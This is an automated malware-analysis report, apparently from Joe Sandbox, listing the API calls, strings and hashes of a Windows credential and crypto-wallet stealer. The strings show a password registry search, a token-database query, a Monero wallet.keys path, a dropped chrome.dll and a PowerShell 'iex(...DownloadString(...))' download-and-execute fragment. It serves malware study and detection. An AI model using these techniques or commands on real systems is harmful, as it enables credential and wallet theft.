                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0011739A
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00117411
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0011746D
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 001174B2
                                      • HeapFree.KERNEL32(00000000), ref: 001174B9
                                      • task.LIBCPMTD ref: 001175B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuetask
                                      • String ID: Password
                                      • API String ID: 775622407-3434357891
                                      • Opcode ID: bf177f27c2d0252f202971852301b152ee102250f5ab8d0960031f22e2871d58
                                      • Instruction ID: 4f49139e90fa705665f7368642f4b391c8eacf029c774a863d69dcfbe292dd79
                                      • Opcode Fuzzy Hash: bf177f27c2d0252f202971852301b152ee102250f5ab8d0960031f22e2871d58
                                      • Instruction Fuzzy Hash: EA613DB590416C9BDB28DB50CC51BD9B7B8BF58300F0081E9E649A6281EF706BC9CF90
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,00E3E5A0,00000000,00020119,?), ref: 00124344
                                      • RegQueryValueExA.ADVAPI32(?,00E3F5A8,00000000,00000000,00000000,000000FF), ref: 00124368
                                      • RegCloseKey.ADVAPI32(?), ref: 00124372
                                      • lstrcat.KERNEL32(?,00000000), ref: 00124397
                                      • lstrcat.KERNEL32(?,00E3F5C0), ref: 001243AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValue
                                      • String ID: $@
                                      • API String ID: 690832082-3381419911
                                      • Opcode ID: 1e77ec6275d06e92e99304740015e7921b31845786e43c7eeeaa3fe11218784a
                                      • Instruction ID: 6a5f18502d2814df567a13ab22eeafea0623ac5d2195b9d22c8ad6615c0e466e
                                      • Opcode Fuzzy Hash: 1e77ec6275d06e92e99304740015e7921b31845786e43c7eeeaa3fe11218784a
                                      • Instruction Fuzzy Hash: 8E4197B6900118ABDB25EBA0EC97FEE733DABA8300F00465CB7155A1C1EF7156D88BD1
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                      • lstrlen.KERNEL32(00000000), ref: 0011BC6F
                                        • Part of subcall function 00128FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00128FE2
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0011BC9D
                                      • lstrlen.KERNEL32(00000000), ref: 0011BD75
                                      • lstrlen.KERNEL32(00000000), ref: 0011BD89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 3073930149-1079375795
                                      • Opcode ID: 7d96b22c609d87056d58276ab87cdf37aa9a3cb02b9f0b9186fa75d456cdb33b
                                      • Instruction ID: 5d0ec187cba72ce5f1cb278817a028e93c2f578652378515f90cc9afa702b11a
                                      • Opcode Fuzzy Hash: 7d96b22c609d87056d58276ab87cdf37aa9a3cb02b9f0b9186fa75d456cdb33b
                                      • Instruction Fuzzy Hash: 4BB1F471910118ABCF18FBA0EDA6EEE737DAF64300F804569F50677191EF346A58CB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: *
                                      • API String ID: 1494266314-163128923
                                      • Opcode ID: a1178e0439aacce7e5fadf47b9ff96845f72936e714e89dcd459c3362b0b125e
                                      • Instruction ID: 14f5644ba1adf2042cb6b3644e986c2fbb420460d27b93123e6e9924d6949f35
                                      • Opcode Fuzzy Hash: a1178e0439aacce7e5fadf47b9ff96845f72936e714e89dcd459c3362b0b125e
                                      • Instruction Fuzzy Hash: 9DF05E3094C389EFD3699FE0E84975CBB38EF04707F114295F60AAA1D1C6744A919B51
                                      APIs
                                      • lstrcat.KERNEL32(?,00E3F6E0), ref: 00124A2B
                                        • Part of subcall function 00128F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00128F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00124A51
                                      • lstrcat.KERNEL32(?,?), ref: 00124A70
                                      • lstrcat.KERNEL32(?,?), ref: 00124A84
                                      • lstrcat.KERNEL32(?,00E2A620), ref: 00124A97
                                      • lstrcat.KERNEL32(?,?), ref: 00124AAB
                                      • lstrcat.KERNEL32(?,00E3E660), ref: 00124ABF
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 00128F20: GetFileAttributesA.KERNEL32(00000000,?,00111B94,?,?,0013577C,?,?,00130E22), ref: 00128F2F
                                        • Part of subcall function 001247C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001247D0
                                        • Part of subcall function 001247C0: RtlAllocateHeap.NTDLL(00000000), ref: 001247D7
                                        • Part of subcall function 001247C0: wsprintfA.USER32 ref: 001247F6
                                        • Part of subcall function 001247C0: FindFirstFileA.KERNEL32(?,?), ref: 0012480D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID: `
                                      • API String ID: 2540262943-4168407445
                                      • Opcode ID: ebdc5a087366853c74a41f0ecbc694923303982fcdc7238dcdca29e7455a1086
                                      • Instruction ID: f6db4e4d071a9d80054851b42171b9ffaabdaac5681d70ce553646de56679c77
                                      • Opcode Fuzzy Hash: ebdc5a087366853c74a41f0ecbc694923303982fcdc7238dcdca29e7455a1086
                                      • Instruction Fuzzy Hash: A03160B290021867CB25FBB0ECC6EDD733CAB68700F404A89B34596095EF70A7D8CB94
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 00129850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,001208DC,C:\ProgramData\chrome.dll), ref: 00129871
                                        • Part of subcall function 0011A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0011A098
                                      • StrCmpCA.SHLWAPI(00000000,00E39330), ref: 00120922
                                      • StrCmpCA.SHLWAPI(00000000,00E393B0), ref: 00120B79
                                      • StrCmpCA.SHLWAPI(00000000,00E392C0), ref: 00120A0C
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                      • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00120C35
                                      Strings
                                      • C:\ProgramData\chrome.dll, xrefs: 001208CD
                                      • C:\ProgramData\chrome.dll, xrefs: 00120C30
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Similarity
                                      • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                      • API String ID: 585553867-663540502
                                      • Opcode ID: 8148c234bacbf2a34c4d260c183abcd914bd34680146ac2dfb9c16a3a72a8589
                                      • Instruction ID: 883ed786f677569c77b50e1aa0353050cda40f297445007cbcef3dce61f072c9
                                      • Opcode Fuzzy Hash: 8148c234bacbf2a34c4d260c183abcd914bd34680146ac2dfb9c16a3a72a8589
                                      • Instruction Fuzzy Hash: 31A168717001089FCB28EF64D996EED777ABFA5300F50856DE40A5F251EB309A15CB92
                                      APIs
                                        • Part of subcall function 00128CF0: GetSystemTime.KERNEL32(00130E1B,00E3E7B8,001305B6,?,?,001113F9,?,0000001A,00130E1B,00000000,?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 00128D16
                                      • wsprintfA.USER32 ref: 00119E7F
                                      • lstrcat.KERNEL32(00000000,?), ref: 00119F03
                                      • lstrcat.KERNEL32(00000000,?), ref: 00119F17
                                      • lstrcat.KERNEL32(00000000,001312D8), ref: 00119F29
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00119F7C
                                      • Sleep.KERNEL32(00001388), ref: 0011A013
                                        • Part of subcall function 001299A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001299C5
                                        • Part of subcall function 001299A0: Process32First.KERNEL32(0011A056,00000128), ref: 001299D9
                                        • Part of subcall function 001299A0: Process32Next.KERNEL32(0011A056,00000128), ref: 001299F2
                                        • Part of subcall function 001299A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00129A4E
                                        • Part of subcall function 001299A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00129A6C
                                        • Part of subcall function 001299A0: CloseHandle.KERNEL32(00000000), ref: 00129A79
                                        • Part of subcall function 001299A0: CloseHandle.KERNEL32(0011A056), ref: 00129A88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Similarity
                                      • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                      • String ID: D
                                      • API String ID: 531068710-2746444292
                                      • Opcode ID: 6202f592b046d5ea19ff7eb85f720942b7f4abf1779f1c119aa76b5a23ccfd9b
                                      • Instruction ID: f8fc1a52b404976a6b0c3e492a2e7f81454b332310fe7da44e3cd3a4b0d402dc
                                      • Opcode Fuzzy Hash: 6202f592b046d5ea19ff7eb85f720942b7f4abf1779f1c119aa76b5a23ccfd9b
                                      • Instruction Fuzzy Hash: 455174B1944318ABEB25DB60DC86FDA7378AF54700F404598F60DAB2C1EB75AB84CF51
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 0018FA1F
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0018FA27
                                      • _ValidateLocalCookies.LIBCMT ref: 0018FAB0
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0018FADB
                                      • _ValidateLocalCookies.LIBCMT ref: 0018FB30
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction ID: c6b1a7186c0d704ca423f54e4e375a8eb055db10d0279632192027797e075f56
                                      • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction Fuzzy Hash: CA41A535A00219EFCF14EF68C884A9E7BB5FF59324F148169E819AB391D7319A06CF91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0011501A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00115021
                                      • InternetOpenA.WININET(00130DE3,00000000,00000000,00000000,00000000), ref: 0011503A
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00115061
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00115091
                                      • InternetCloseHandle.WININET(?), ref: 00115109
                                      • InternetCloseHandle.WININET(?), ref: 00115116
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                      • String ID:
                                      • API String ID: 3066467675-0
                                      • Opcode ID: 4334bef937ecd813004af0c11e230a4ce637b5ca5d82f78def9804bc265a70c7
                                      • Instruction ID: 83dbc06f8400e22f2622ac01c169ac7add7d439fe5086ab2f81264afd2e6c339
                                      • Opcode Fuzzy Hash: 4334bef937ecd813004af0c11e230a4ce637b5ca5d82f78def9804bc265a70c7
                                      • Instruction Fuzzy Hash: 69311BB4A04218EBDB24CF94DC85BDCB7B5AB48304F5085D8F709A7281C7706EC58F98
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001285B6
                                      • wsprintfA.USER32 ref: 001285E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0012860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0012861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00128629
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                      • RegQueryValueExA.ADVAPI32(00000000,00E3F3F8,00000000,000F003F,?,00000400), ref: 0012867C
                                      • lstrlen.KERNEL32(?), ref: 00128691
                                      • RegQueryValueExA.ADVAPI32(00000000,00E3F518,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00130B3C), ref: 00128729
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00128798
                                      • RegCloseKey.ADVAPI32(00000000), ref: 001287AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: ae762de052f2c8b269a824a692a55768f5c032d45d35b1f6d27cf13aec52a250
                                      • Instruction ID: cd016ab8b2e31722a38e91ca79c5c89aa31bc6564af13a8b6d0b56155e628e2d
                                      • Opcode Fuzzy Hash: ae762de052f2c8b269a824a692a55768f5c032d45d35b1f6d27cf13aec52a250
                                      • Instruction Fuzzy Hash: FA21FC7191522CABDB24DB54DC85FE9B3B8FB48700F1085D8E609A6180DF716A85CFE4
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001299C5
                                      • Process32First.KERNEL32(0011A056,00000128), ref: 001299D9
                                      • Process32Next.KERNEL32(0011A056,00000128), ref: 001299F2
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00129A4E
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00129A6C
                                      • CloseHandle.KERNEL32(00000000), ref: 00129A79
                                      • CloseHandle.KERNEL32(0011A056), ref: 00129A88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 0087bd68b40f461624e1085f69dd5d8a9ee579e78af7b2365c66a227741b6283
                                      • Instruction ID: dc17f362442718d7bd5665432431b72202a22cdefc144d073a01922e74c2e74e
                                      • Opcode Fuzzy Hash: 0087bd68b40f461624e1085f69dd5d8a9ee579e78af7b2365c66a227741b6283
                                      • Instruction Fuzzy Hash: 3F21EA71904328ABDB35DFA5EC88BDDB7B9BB48304F1045C8E50AAB290D7749E94CF50
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00127FC7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00127FCE
                                      • RegOpenKeyExA.ADVAPI32(80000002,00E2B7D0,00000000,00020119,?), ref: 00127FEE
                                      • RegQueryValueExA.ADVAPI32(?,00E3E520,00000000,00000000,000000FF,000000FF), ref: 0012800F
                                      • RegCloseKey.ADVAPI32(?), ref: 00128022
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-3162483948
                                      • Opcode ID: 75a20fbadc5abd9309bc8d74eb5ab4cbee8aee771f83256cadba8a0bc077e418
                                      • Instruction ID: 8a51ee8efde5c571a3e0bc577a7803c0fef5ab8dd68892a81d09920dd64f059f
                                      • Opcode Fuzzy Hash: 75a20fbadc5abd9309bc8d74eb5ab4cbee8aee771f83256cadba8a0bc077e418
                                      • Instruction Fuzzy Hash: 78118FB1A44245EBD714CB84ED86F6FB7BCEB04B10F104219F611AB2C0D77558008BA1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00127834
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0012783B
                                      • RegOpenKeyExA.ADVAPI32(80000002,00E2B8B0,00000000,00020119,00000000), ref: 0012786D
                                      • RegQueryValueExA.ADVAPI32(00000000,00E3F320,00000000,00000000,?,000000FF), ref: 0012788E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00127898
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: 2eed73b9e2a805ae6efdb3281d3b459a4b94cea4b781e57009c203ab7f85234d
                                      • Instruction ID: c91c4271fb42de53b76e03214f94d86678dde155ad74c32faffc47f521aafe50
                                      • Opcode Fuzzy Hash: 2eed73b9e2a805ae6efdb3281d3b459a4b94cea4b781e57009c203ab7f85234d
                                      • Instruction Fuzzy Hash: F101FF75A48349FBEB11DBE4ED8AF6E777CEB48700F104598FA05AA2D0D770A950CB50
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001278C4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001278CB
                                      • RegOpenKeyExA.ADVAPI32(80000002,00E2B8B0,00000000,00020119,00127849), ref: 001278EB
                                      • RegQueryValueExA.ADVAPI32(00127849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0012790A
                                      • RegCloseKey.ADVAPI32(00127849), ref: 00127914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: e6fc64d3caad25fdb2494289efe4480c399efe804c8ee2b264f9d9332437e511
                                      • Instruction ID: b8f2d8916fa9ad8507aff3ff928ff8f929b4f8743d9b75f615d8b9f7e39f5999
                                      • Opcode Fuzzy Hash: e6fc64d3caad25fdb2494289efe4480c399efe804c8ee2b264f9d9332437e511
                                      • Instruction Fuzzy Hash: 3901F4B5A44349BBDB11DBD4EC8AFAE777CEB44700F104598F605AB2C1D7706A508B90
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0011A13C
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0011A161
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 0011A181
                                      • ReadFile.KERNEL32(000000FF,?,00000000,0011148F,00000000), ref: 0011A1AA
                                      • LocalFree.KERNEL32(0011148F), ref: 0011A1E0
                                      • CloseHandle.KERNEL32(000000FF), ref: 0011A1EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: 1603f8058d08d3f046a65f50300eb0a6463ac4c3553f06706214eda6af2729f0
                                      • Instruction ID: 69d88a7d1c8c14edc3ef52559297ce337359226e5e701172099c8d96dfe620bb
                                      • Opcode Fuzzy Hash: 1603f8058d08d3f046a65f50300eb0a6463ac4c3553f06706214eda6af2729f0
                                      • Instruction Fuzzy Hash: 80310E74A01209EFDB15CF94D885BEE7BB9BF48300F508158E911AB2D0D774AA81CFA1
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 00128CF0: GetSystemTime.KERNEL32(00130E1B,00E3E7B8,001305B6,?,?,001113F9,?,0000001A,00130E1B,00000000,?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 00128D16
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0011D901
                                      • lstrlen.KERNEL32(00000000), ref: 0011DA9F
                                      • lstrlen.KERNEL32(00000000), ref: 0011DAB3
                                      • DeleteFileA.KERNEL32(00000000), ref: 0011DB32
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID: X
                                      • API String ID: 211194620-1677210272
                                      • Opcode ID: fc84354bfa32075c28bd044dd6893313cfaa118addc5ad9454835e93066403e9
                                      • Instruction ID: 9b1b7101a657340e6b5d238606df15409a8ee4b377df7a63bd0d4bc6f891a77c
                                      • Opcode Fuzzy Hash: fc84354bfa32075c28bd044dd6893313cfaa118addc5ad9454835e93066403e9
                                      • Instruction Fuzzy Hash: BC81F7729101189BCB15FBA4EDA6DEE733DAF64300F804558F51677091EF307A68CB62
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00122FD5
                                      Strings
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00122F14
                                      • ')", xrefs: 00122F03
                                      • <, xrefs: 00122F89
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00122F54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
